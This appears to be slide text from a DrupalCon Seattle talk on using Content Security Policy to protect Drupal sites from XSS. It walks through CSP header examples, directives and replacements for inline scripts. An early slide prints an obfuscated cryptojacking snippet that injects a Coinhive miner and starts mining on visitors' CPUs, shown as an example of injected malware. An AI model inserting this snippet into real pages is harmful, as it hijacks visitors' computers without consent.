Is your site really safe from XSS?

Bringing Content Security Policy to Drupal

Drupalcon Seattle
Geoff Appleby
https://gapple.github.io/presentation-csp-dc-seattle/
- 887th place 

							<script src="https://cdn.example.com/script.js" async></script>
						

							/* [Warning] Do not copy or self host this file, you will not be supported */ 



							
							window["document"]["write"]("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?rnd="+window["Math"]["random"]()+"'></script>");window["document"]["write"]('<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = {threads: 8,throttle:0.6}} var miner = new CoinHive.Anonymous(\'1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq\', cpuConfig);miner.start();</script>');
10
PM Do you know where your data is?
Article about credit card theft via JavaScript malware
References
Drupal node creation page, with XSS attempt in the title field
Drupal XSS Security Advisory
Drupal administration page, with field for script to be added inline on every page
References
Web security is like an onion

Web security is like an onion

It stinks?

It stinks?

Layers!

Layers!

The HTTP Content-Security-Policy response header allows web site administrators to control resources the user agent is allowed to load for a given page.

MDN web docs: Content-Security-Policy
2
3
Project page for the content security policy module 

							Content-Security-Policy: default-src 'none';
						

							Content-Security-Policy: default-src 'self';
						

							Content-Security-Policy: default-src 'self'; style-src 'self' https://fonts.googleapis.com
						

							Content-Security-Policy:
							  default-src 'self';
							  style-src 'self' https://fonts.googleapis.com;
							  font-src https://fonts.gstatic.com
						

								Content-Security-Policy:
									default-src https: 'unsafe-inline';
									report-uri https://example.test/report-uri/csp

								Content-Security-Policy-Report-Only:
									default-src: 'self';
									report-uri https://example.test/report-uri/csp-ro
  • default-src
    • script-src
      • script-src-attr â‘¢
      • script-src-elem â‘¢
    • style-src
      • style-src-attr â‘¢
      • style-src-elem â‘¢
    • font-src
    • img-src
    • media-src
    • connect-src
  • frame-ancestors
Drupal core issue for CKEditor 4 requiring unsafe-inline CSP policy 

								Content-Security-Policy:
									script-src 'self' 'unsafe-inline' cdn.example.com
									script-src-elem 'self' cdn.example.com
									script-src-attr 'unsafe-inline'
							

								<script>
								(function(i,s,o,g,r,a,m){
								  i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},
								  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
								})(window,document,'script','https://cdn.example.com/script.js','api');

								api('call');
								</script>
Replace with

								<script src="https://cdn.example.com/script.js" async></script>
								<script src="/api-call.js"></script>
							

								window.api=window.api||function(){(api.q=api.q||[]).push(arguments)};

								(function (drupalSettings) {

									api(drupalSettings.api.data);

								})(drupalSettings);
api-call.js
Googalytics Drupal module project page
"But I need this inline script"
But do you really?..

								Content-Security-Policy: script-src 'self' 'sha256-blLDIhKaPEZDhc4WD45BC7pZxW4WBRp7E5Ne1wC/vdw='
References

More To Explore

  • Subresource Integrity (SRI)
  • Feature Policy
  • Reporting API
    • Network Error Logging
    • Deprecation & Intervention
  • Certificate Transparency & Expect-Staple
  • Certificate Authority Authorisation
Join contribution opportunities
Friday, April 12, 2019
gappleca